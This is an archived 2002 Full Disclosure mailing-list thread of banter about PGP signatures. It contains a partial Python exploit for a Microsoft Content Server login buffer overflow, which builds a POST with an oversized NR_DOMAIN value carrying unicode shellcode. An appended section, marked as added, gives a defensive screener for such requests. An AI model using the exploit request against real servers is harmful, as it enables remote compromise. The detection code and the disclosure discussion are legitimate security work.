Full Disclosure mailing list archives

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p


From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Wed, 14 Aug 2002 14:24:51 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

You supposed to be turkey friend turkey crew wanttobe yet you question

show respect to turkey

On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:
At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.
#stroverwrite(), unicodeloop and the mscsexploit class (setHost, setPort,
#setSSL, run) live in the full exploit and are not included in this fragment.
import sys
import urllib

#returns the sploitstring
    def makesploit(self):
        header=""
        body=""

        body+="NR_DOMAIN=WinNT%3A%2F%2F"
        #1 alignment byte so we are word aligned with the return addr
        attack=""
        attack+="A"
        attack+="\x41\xb9"*4000
        #unicode shellcode!!
        attack=stroverwrite(attack,unicodeloop,1)
        print "length of overflow = "+str(len(attack))
        attack=urllib.quote(attack)
        #print attack

        body+=attack

        body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"

        header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
        header+="Host: "+self.host+"\r\n"
        header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
        header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
        header+="Connection: keep-alive\r\n"
        header+="Content-Type: application/x-www-form-urlencoded\r\n"
        header+="Content-Length: "+str(len(body))+"\r\n"
        header+="\r\n"

        return header+body


#this stuff happens.
if __name__ == '__main__':

    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()

    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))

    if len(sys.argv) > 3:
        app.setSSL(1)

    app.run()


On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

or if you like

On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:
On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
Gobbles,

On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
GOBBLES just want to be cool whitehat like everyone else.  Time for new
leaf time for six figure salary stock option naked breasted assistant.

Word to that my man! ;)

peace,
core

Your message was signed, but the "GOBBLES" message was not and therefore
just a forgery, most likely.

BTW:
http://www.immunitysec.com/vulnerabilities/
They aren't advisories, but if you need something to show to your boss
about why you disconnected your Exchange/SQL server from the Internet,
it's a good start.

Dave Aitel
Immunity, Inc



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople




-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
-----END PGP SIGNATURE-----


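The quoted fragment shows the shape of the overflow request: a POST to /NR/System/Access/ManualLoginSubmit.asp whose NR_DOMAIN field carries a WinNT:// prefix followed by several kilobytes of filler. The screener below is an added example written for this archive page; it is not part of Dave Aitel's post or of Immunity's exploit. The login path, the field names and the WinNT:// prefix come from the fragment; the 256-byte limit, the host name and the two sample requests are constructed assumptions.

```python
"""Screen Content Management Server login POSTs for oversized NR_DOMAIN values.

Added detection example, constructed for this page; not part of the original
post or of Immunity's exploit. LOGIN_PATH, the field names and the WinNT://
prefix come from the quoted fragment; MAX_DOMAIN_LEN is an assumption.
"""
from urllib.parse import unquote_to_bytes

LOGIN_PATH = "/NR/System/Access/ManualLoginSubmit.asp"
MAX_DOMAIN_LEN = 256  # assumed cut-off; a real WinNT://<domain> path is far shorter


def parse_request(raw):
    """Split raw HTTP/1.x request text into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form(body):
    """Decode a form-urlencoded body to {name: [bytes]}, keeping raw byte values.

    unquote_to_bytes is used on purpose: decoding to str would turn a byte such
    as 0xB9 into a replacement character and hide the non-ASCII filler.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        key = unquote_to_bytes(name).decode("ascii", "replace")
        params.setdefault(key, []).append(unquote_to_bytes(value.replace("+", " ")))
    return params


def inspect_login_post(raw):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    method, path, _headers, body = parse_request(raw)
    if method != "POST" or path != LOGIN_PATH:
        return []
    findings = []
    for value in parse_form(body).get("NR_DOMAIN", []):
        if len(value) > MAX_DOMAIN_LEN:
            findings.append("NR_DOMAIN is %d bytes (limit %d)" % (len(value), MAX_DOMAIN_LEN))
        if not value.upper().startswith(b"WINNT://"):
            findings.append("NR_DOMAIN does not start with WinNT://")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append("NR_DOMAIN contains non-printable or non-ASCII bytes")
    return findings


def build_request(host, body):
    """Assemble a POST in the same shape the quoted fragment emits (sample input only)."""
    return ("POST %s HTTP/1.1\r\nHost: %s\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n%s" % (LOGIN_PATH, host, len(body), body))


# Constructed sample traffic: a normal login and an oversized, non-ASCII domain value.
BENIGN = build_request("cms.example.test",
                       "NR_DOMAIN=WinNT%3A%2F%2FCORP&NR_USER=alice&NR_PASSWORD=x"
                       "&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp")
SUSPECT = build_request("cms.example.test",
                        "NR_DOMAIN=WinNT%3A%2F%2F" + "A%B9" * 3000
                        + "&NR_USER=&NR_PASSWORD=&submit1=Continue")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, inspect_login_post(req) or "clean")
```

Run as a script it classifies the two constructed requests; in practice feed it the request text a reverse proxy or IDS captures. Any finding on the login path is worth an alert, since a legitimate WinNT://<domain> value is a short printable string and never approaches the limit.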


